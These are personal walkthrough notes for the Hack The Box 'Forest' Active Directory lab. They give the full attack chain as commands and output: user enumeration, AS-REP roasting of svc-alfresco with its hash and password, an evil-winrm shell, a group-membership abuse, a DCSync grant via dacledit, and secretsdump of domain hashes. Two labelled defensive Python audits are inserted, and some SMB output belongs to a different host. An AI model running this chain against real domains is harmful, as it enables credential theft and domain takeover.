Forest AD machine HTB

Start

Scanning with nmap


Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-11-24T03:14:39
work  0 VPN 1 code 2 vscode 3 newZSH 4 bloodhound 5 zsh 6 code 7 win7 8 zsh 9 zsh-  10 code* 

Enumerate

lika@learning:~/Downloads/CVE-2024-8353$ netexec smb $IP
[*] Adding missing option 'check_guest_account' in config section 'nxc' to nxc.conf
[*] Adding missing section 'BloodHound-CE' to nxc.conf
[*] Adding missing option 'bhce_enabled' in config section 'BloodHound-CE' to nxc.conf
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False) (Null Auth:True)

netexec smb $target -u '' -p '' --users
netexec smb $target -u '' -p '' --rid-brute
netexec smb $target -u 'guest' -p '' --rid-brute
netexec ldap $target -u 'guest' -p '' --users
netexec ldap $target -u 'guest' -p '' --rid-brute
netexec ldap $target -u '' -p '' --users

Get the user list

netexec smb $target -u '' -p '' --rid-brute | grep -i 'sidtypeuser' | awk '{print $6}' | cut -d '\' -f2 | tee users.txt
netexec ldap $target -u '' -p '' --users | awk '{print $5}' | fgrep -v '[*]' | tee users.txt

Add the domain to the hosts file

Enumerate the user list over Kerberos (pre-auth check)

netexec ldap $target -u 'users1.txt' -p '' -k

LDAP 10.10.10.161 389 FOREST [-] htb.local\Administrator: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\Guest: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\DefaultAccount: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\krbtgt: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\$331000-VK4ADACQNUCA: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\SM_2c8eef0a09b545acb: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\SM_ca8c2ed5bdab4dc9b: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\SM_75a538d3025e4db9a: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\SM_681f53d4942840e18: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\SM_1b41c9286325456bb: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\SM_9b69f1b9d2cc45549: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\SM_7c96b981967141ebb: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\SM_c75ee099d0a64c91b: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\SM_1ffab36a2f5f479cb: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\HealthMailboxc3d7722: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\HealthMailboxfc9daad: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\HealthMailboxc0a90c9: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\HealthMailbox670628e: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\HealthMailbox968e74d: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\HealthMailbox6ded678: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\HealthMailbox83d6781: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\HealthMailboxfd87238: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\HealthMailboxb01ac64: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\HealthMailbox7108a4e: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\HealthMailbox0659cc1: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\sebastien: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\lucinda: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [+] htb.local\svc-alfresco account vulnerable to asreproast attack
LDAP 10.10.10.161 389 FOREST [-] htb.local\andy: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\mark: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\santi: KDC_ERR_PREAUTH_FAILED

Run this

netexec ldap $target -u 'users1.txt' -p '' -k --asreproast asrep.txt

[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
LDAP 10.10.10.161 389 FOREST $krb5asrep$23$svc-alfresco@HTB.LOCAL:97996e5d4e091c10106f44b6a916717d$2480b0fa852f323f8729de5983dca6f34787e2f09c25f163d918e2433bef60996db5bbdcb8def50487a74fa060e38a1abfc29a43fdc670de22e8d57039eac1aeaa07e3d8f7e99226f8af5b9af81e6f77de3be29eb3a6b2fd96e7a9028a6edb8e0bdd8d06e6c562461ab8d829735eaf79481e619a84f7c46ac930b661d9860984ca67c29702e0c891ae2d6b4bbaa93c30bc5bc4ee24793780f9a32a885941e7fec8650c5b0105b59e5c51d9b5926d8e53b8ba3f5e10f834b2e98c1c6ad4a854d823a30b63aab12785c97373f7f3e6e788c9c2e8c87dbdbb6d29eff4a924ecea50e7df368670ae
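As an added defender-side example (not part of these notes), the following Python triages netexec Kerberos output of the kind shown above into accounts that still need pre-authentication re-enabled, and builds the LDAP filter an admin would use to find them directly. The sample lines are a constructed subset copied from the listing; the userAccountControl bit value and the bitwise-AND matching-rule OID are standard Active Directory values.

```python
import re

# Constructed sample of netexec "ldap ... -k" output, copied from the listing above.
SAMPLE_OUTPUT = """\
LDAP 10.10.10.161 389 FOREST [-] htb.local\\Administrator: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\\Guest: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\\krbtgt: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [+] htb.local\\svc-alfresco account vulnerable to asreproast attack
LDAP 10.10.10.161 389 FOREST [-] htb.local\\andy: KDC_ERR_PREAUTH_FAILED
"""

# "[-] domain\user: KDC_ERR_..." or "[+] domain\user account vulnerable ..."
LINE_RE = re.compile(r"\[(?P<mark>[-+])\] (?P<domain>[^\\]+)\\(?P<user>\S+?):? (?P<rest>.*)$")

UF_ACCOUNTDISABLE = 0x0002           # userAccountControl: account disabled
UF_DONT_REQUIRE_PREAUTH = 0x400000   # userAccountControl: Kerberos pre-auth not required


def classify(output: str) -> dict:
    """Map each account in netexec Kerberos output to what the KDC reply means."""
    result = {}
    for line in output.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        user, rest = m["user"], m["rest"]
        if "asreproast" in rest:
            result[user] = "no-preauth"        # DONT_REQ_PREAUTH set: AS-REP crackable offline
        elif "KDC_ERR_CLIENT_REVOKED" in rest:
            result[user] = "disabled"          # disabled or locked: nothing to roast
        elif "KDC_ERR_PREAUTH_FAILED" in rest:
            result[user] = "preauth-required"  # healthy default for an enabled account
        else:
            result[user] = "other"
    return result


def needs_remediation(uac: int) -> bool:
    """True when an enabled account has pre-auth disabled (clear the flag, rotate password)."""
    return bool(uac & UF_DONT_REQUIRE_PREAUTH) and not (uac & UF_ACCOUNTDISABLE)


def preauth_disabled_filter() -> str:
    """LDAP filter listing accounts with DONT_REQ_PREAUTH set (1.2.840.113556.1.4.803 = bitwise AND)."""
    return (f"(&(objectCategory=person)"
            f"(userAccountControl:1.2.840.113556.1.4.803:={UF_DONT_REQUIRE_PREAUTH}))")


if __name__ == "__main__":
    for user, state in classify(SAMPLE_OUTPUT).items():
        print(f"{user:20} {state}")
    print(preauth_disabled_filter())
```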

impacket-GetUserSPNs -dc-ip $target 'htb.local/svc-alfresco:s3rvice' -request

Did not work.

Enum target

Try every case: the SMB, RDP, LDAP ports and so on. After trying them all, WinRM has admin rights.

netexec: error: unrecognized arguments: -svc-alfresco
lika@learning:~/Downloads/CVE-2024-8353$ netexec smb $target -u 'svc-alfresco' -p 's3rvice'
SMB 10.10.10.161 445 FOREST [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB 10.10.10.161 445 FOREST [+] htb.local\svc-alfresco:s3rvice
lika@learning:~/Downloads/CVE-2024-8353$ netexec rdp $target -u 'svc-alfresco' -p 's3rvice'
lika@learning:~/Downloads/CVE-2024-8353$ netexec winrm $target -u 'svc-alfresco' -p 's3rvice'
WINRM 10.10.10.161 5985 FOREST [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
WINRM 10.10.10.161 5985 FOREST [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)
lika@learning:~/Downloads/CVE-2024-8353$ evil-winrm -i $target -u 'svc-alfresco' -p s3rvice

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

run whoami /all

Wget PowerUp.ps1, then run . .\PowerUp.ps1 and Invoke-AllChecks -> note that the ". ." has a space between the dots.

Run the BloodHound collection:

netexec ldap $target -u 'svc-alfresco' -p 's3rvice' --bloodhound --collection All --dns-server $target

net rpc group members "Exchange Windows Permissions" -U "htb.local"/"svc-alfresco"%"s3rvice" -S "htb.local"

HTB\Exchange Trusted Subsystem

net rpc group addmem "Exchange Windows Permissions" "svc-alfresco" -U "htb.local"/"svc-alfresco"%"s3rvice" -S "htb.local"

net rpc group members "Exchange Windows Permissions" -U "htb.local"/"svc-alfresco"%"s3rvice" -S "htb.local"

impacket-dacledit -action 'write' -rights 'DCSync' -principal 'svc-alfresco' -target-dn 'DC=htb,DC=local' 'htb.local'/'svc-alfresco':'s3rvice'

Adding the user again and re-running it worked.

net rpc group members "Exchange Windows Permissions" -U "htb.local"/"svc-alfresco"%"s3rvice" -S "htb.local"

HTB\Exchange Trusted Subsystem

net rpc group addmem "Exchange Windows Permissions" "svc-alfresco" -U "htb.local"/"svc-alfresco"%"s3rvice" -S "htb.local"

net rpc group members "Exchange Windows Permissions" -U "htb.local"/"svc-alfresco"%"s3rvice" -S "htb.local"

impacket-secretsdump -just-dc-ntlm htb.local/svc-alfresco:s3rvice@$target
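Added example, not from these notes: an audit of which trustees hold both replication extended rights on the domain naming context, which is the condition the dacledit step above creates for svc-alfresco and the thing a defender should compare against a documented baseline. The ACL and the baseline set are constructed; the rights GUIDs and access-mask bits are the standard AD values.

```python
from dataclasses import dataclass

RIGHT_DS_CONTROL_ACCESS = 0x100   # ADS_RIGHT_DS_CONTROL_ACCESS: extended rights
GENERIC_ALL = 0x10000000          # full control implies every extended right
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DCSYNC_RIGHTS = (DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL)


@dataclass(frozen=True)
class Ace:
    trustee: str
    allow: bool            # False = access-denied ACE
    mask: int
    object_type: str = ""  # empty GUID = ACE covers all extended rights


def _grants(ace: Ace, right_guid: str) -> bool:
    """Does this ACE cover the given extended right?"""
    if ace.mask & GENERIC_ALL:
        return True
    if ace.mask & RIGHT_DS_CONTROL_ACCESS:
        return ace.object_type in ("", right_guid)
    return False


def dcsync_principals(acl) -> list:
    """Trustees effectively allowed both replication rights (deny ACEs win)."""
    holders = []
    for guid in DCSYNC_RIGHTS:
        allowed = {a.trustee for a in acl if a.allow and _grants(a, guid)}
        denied = {a.trustee for a in acl if not a.allow and _grants(a, guid)}
        holders.append(allowed - denied)
    return sorted(set.intersection(*holders))


def unexpected_dcsync(acl, baseline) -> list:
    """Principals able to DCSync that are not in the documented baseline."""
    return [p for p in dcsync_principals(acl) if p not in baseline]


# Constructed ACL for DC=htb,DC=local as it would look after the dacledit step above.
SAMPLE_ACL = [
    Ace("HTB\\Domain Controllers", True, RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES),
    Ace("HTB\\Domain Controllers", True, RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES_ALL),
    Ace("BUILTIN\\Administrators", True, RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES),
    Ace("BUILTIN\\Administrators", True, RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES_ALL),
    Ace("HTB\\svc-alfresco", True, RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES),
    Ace("HTB\\svc-alfresco", True, RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES_ALL),
    Ace("HTB\\andy", True, RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES),  # one right only
]
BASELINE = {"HTB\\Domain Controllers", "BUILTIN\\Administrators"}  # assumed documented baseline

if __name__ == "__main__":
    print("unexpected DCSync holders:", unexpected_dcsync(SAMPLE_ACL, BASELINE))
```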